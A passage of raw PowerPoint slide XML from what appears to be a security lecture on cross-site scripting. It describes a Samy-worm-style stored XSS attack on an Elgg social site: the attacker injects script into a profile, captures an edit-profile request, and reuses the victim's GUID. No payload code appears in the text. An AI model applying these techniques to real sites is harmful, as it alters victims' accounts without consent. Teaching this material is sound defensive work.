              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF239E32-268B-4E54-A23B-BCE005402FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8571801" y="2280090"/>
            <a:ext cx="398463" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A39A8B-FC54-4332-B982-384A0D56659A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8571801" y="2545203"/>
            <a:ext cx="398463" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1212574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B32A-44A6-45A9-88D6-EC8471CEE4A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject the code into a profile</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC59138-D21D-4415-A80F-BE0D14EE889E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="3932609" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Samy puts the script in the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>About Me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” section of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>his</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After that, let’s login as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” and visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript code will be run and not displayed to Alice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code sends an add-friend request to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> friends list, Samy is added.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678439C3-9209-4383-9386-AAC52AA9D552}"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9E5ACC-4005-47BD-AD8B-9BC3344DF485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4124633" y="870561"/>
            <a:ext cx="4827343" cy="3760053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123862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C8D5-F388-4FF6-87B7-EA27684FBB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outline</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A94FE5-337A-4530-BF3F-4E99323D936A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Cross-Site Scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Damage done by XSS attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attacks to befriend with others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{138A6E3D-E494-4FC0-BB11-F94A191A2429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" sz="675">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="675">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46222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08A9-69AC-4486-8CA8-215B2BDCEF53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks to change other people’s profiles</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3741A7B7-F3A1-4B26-9AC1-CCE4F9BDC1E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal:  Putting a statement “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAMY is MY HERO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” in other people’s profile without their consent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Investigation taken by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Samy :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Samy captured an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>edit-profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP Header Live</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591B21FB-DAEE-415C-ADD3-8B6BF31F448D}"/>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19</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2730554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54880-5DE0-48DF-AB03-64CC76BCAD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Captured HTTP request</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE8F217-C5C1-4D86-B336-43DB0A5638C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="3267317" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Line ①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: URL of the edit-profile service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Line ②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Session cookie (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>unique for each user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). It is automatically set by browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Line ③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: CSRF countermeasures, which are now enabled. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32F8565-F30E-42FB-B224-C4172DBAAD99}"/>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA19E09-8AC3-4729-9AB3-6DE1BF2298C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3459341" y="867512"/>
            <a:ext cx="5510924" cy="3763103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3967024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Rectangle 306">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC2A406-96C3-4B99-BA24-42AD9A5C1ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712872" y="894826"/>
            <a:ext cx="8061158" cy="1281074"/>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NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="TextBox 308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F11CB9-6F8B-4E74-9A96-4229A8484AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8298366" y="1155792"/>
            <a:ext cx="398463" cy="253083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="1000" b="1" dirty="0"/>
              <a:t>④</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="TextBox 310">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C08581-5D95-42E3-8147-88A869392C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8298366" y="1420905"/>
            <a:ext cx="398463" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
              <a:t>⑤</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB7AF3E1-6946-4580-96FF-45ACAD002FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Captured HTTP request (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B15F8BF5-F93D-4593-A5C3-0D73FD8C1EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="2244999"/>
            <a:ext cx="8778240" cy="2385616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>Line ④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: Description field with our text “Samy is my hero” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>Line ⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: Access level of each field: 2 means the field is viewable to everyone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>Line ⑥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: User ID (GUID) of the victim. This can be obtained by visiting victim’s profile page source. In XSS, as this value can be obtained from the page. As we don’t want to limit our attack to one victim, we can just add the GUID from JavaScript variable called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elgg.session.user.guid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7585ED-D765-4905-BA81-B4AFE24976C5}"/>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="211" name="Group 210">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF57C4F-A0DF-4DBF-A4DB-E136F117C63A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1042987" y="970213"/>
            <a:ext cx="2806701" cy="1116013"/>
            <a:chOff x="1646237" y="946150"/>
            <a:chExt cx="2806701" cy="1116013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="115" name="Freeform 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93EDFA94-CF33-4CF0-A27C-77F08FD45570}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
